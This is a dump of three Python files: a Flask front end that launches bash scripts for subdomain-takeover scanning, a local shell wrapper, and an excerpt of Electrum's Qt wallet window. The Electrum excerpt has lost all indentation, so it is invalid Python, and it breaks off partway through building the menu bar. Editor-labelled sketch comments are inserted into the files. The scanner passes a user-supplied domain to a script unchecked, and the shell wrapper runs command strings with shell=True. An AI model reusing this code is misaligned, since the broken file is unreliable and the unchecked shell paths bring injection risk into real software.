| source | python |
|---|---|
app.py
|
#!/usr/bin/python
# encoding: utf-8
from flask import Flask
from flask import render_template, redirect, url_for, request
from threading import Thread
import subprocess, os

# Initialise the Flask application
app = Flask(__name__)

# Index route
@app.route("/", methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        if "scan" in request.form:
            # Threaded mass scan
            run_mass_scan()
            return redirect(url_for('massscan'))
        if "domain" in request.form:
            # Threaded single scan
            domain = request.form.get('domain')
            run_single_scan(domain)
            return redirect(url_for('singlescan', domain=domain))
    return render_template('home.html')

# Do a mass scan on all subdomains
def run_mass_scan():
    thr = Thread(target=run_async_mass_scan, args=[])
    thr.start()
    return thr

# Run a mass async scan
def run_async_mass_scan():
    # Shell tokens such as '&>/dev/null' and '&' are not interpreted when passed
    # as list arguments, so discard the output explicitly instead.
    process = subprocess.Popen(['bash', 'subauto.sh'],
                               stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    process.communicate()

# Do a single scan
def run_single_scan(domain):
    thr = Thread(target=run_async_single_scan, args=[domain])
    thr.start()
    return thr

# Run a single async scan
def run_async_single_scan(domain):
    process = subprocess.Popen(['bash', 'single.sh', domain],
                               stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    process.communicate()
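# Illustrative usage (editor's sketch, not part of the original app):
# run_single_scan("example.com") returns the started Thread immediately while
# single.sh keeps running in the background, so the request handler can redirect
# to the status page without waiting for the scan to finish.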
# Start the scan.
@app.route('/mass-scan')
def massscan():
    try:
        if os.path.isfile('domains.txt'):
            if os.path.isfile("done.txt"):
                return redirect(url_for('results'))
            if os.path.isfile("takeovers"):
                return redirect(url_for('results'))
            else:
                f = open('domains.txt', 'r+', encoding="utf-8")
                content = f.readlines()
                return render_template('scan.html', len=len(content), domain="")
        else:
            return render_template('scan.html', len=0, domain="")
    except TypeError:
        return render_template('scan.html', len=0, domain="")

# Start the single scan.
@app.route('/single-scan/<domain>')
def singlescan(domain):
    try:
        if os.path.isfile('domains.txt'):
            if os.path.isfile("done.txt"):
                return redirect(url_for('results'))
            if os.path.isfile("takeovers"):
                return redirect(url_for('results'))
            else:
                f = open('domains.txt', 'r+', encoding="utf-8")
                content = f.readlines()
                return render_template('scan.html', len=len(content), domain=domain)
        else:
            return render_template('scan.html', len=0, domain=domain)
    except TypeError:
        return render_template('scan.html', len=0, domain=domain)

# Display the results
@app.route('/results')
def results():
    # Check to see if the session is mine
    if os.path.isfile("takeovers"):
        if os.path.isfile("links"):
            f1 = open('takeovers', 'r')
            content = f1.readlines()
            f3 = open('links', 'r')
            links = f3.readlines()
            return render_template('results.html', len=len(content), domains=len(content), content=content, links=links)
        else:
            return render_template('results.html', len=0, domains=0, content="Still Processing...", links="")
    else:
        return render_template('results.html', len=0, domains=0, content="No Subdomain Takeovers Found", links="")

# Run the application
if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=False, port=5444)
|
localshell.py
|
from subprocess import Popen, PIPE
from .abstractshell import AbstractShell
from .shellresult import ShellResult
from .streamreader import StandardStreamReader
from .queue import Queue
from threading import Thread
from shutil import copyfile
from os import chmod, stat, environ


class LocalShell(AbstractShell):

    def __init__(self, *args, **kwargs):
        AbstractShell.__init__(self, *args, **kwargs)
        self.update(environ)

    def execute_command(self, command, env={}, wait=True, check_err=False, cwd=None):
        process = Popen(command, env=env, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
        queue = Queue()
        StandardStreamReader(process.stdout, 1, queue)
        StandardStreamReader(process.stderr, 2, queue)
        def post_process_exit_code():
            queue.put((0, process.wait()))
            queue.put((0, None))
        Thread(target=post_process_exit_code).start()
        return ShellResult(self, command, queue, wait, check_err)

    def do_pull(self, local_path, remote_path):
        copyfile(remote_path, local_path)

    def do_push(self, local_path, remote_path):
        copyfile(local_path, remote_path)
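# Illustrative usage sketch (editor's addition; exact ShellResult semantics depend
# on the surrounding library):
#     shell = LocalShell()
#     result = shell.execute_command("echo hello")  # ShellResult fed by the reader queue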
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
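# Illustrative usage sketch (editor's addition): inside ElectrumWindow one could do
#     sb = StatusBarButton(read_QIcon("status_connected.png"), _("Network"),
#                          self.gui_object.show_network_dialog)
#     self.statusBar().addPermanentWidget(sb)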
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
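# Illustrative usage sketch (editor's addition; the method name below is hypothetical):
#     @protected
#     def example_sign_something(self, data, password):
#         ...  # password is None for unencrypted wallets; on cancel the wrapper returns early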
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
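# Illustrative counter-example (editor's addition): registering e.g.
#     util.register_callback(lambda *args: self.update_status(), ['status'])
# would store a closure over `self` in the callback registry and keep this window
# alive after it is closed, which is exactly what the note above warns against.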
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce something,
# since the callback may have fired before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
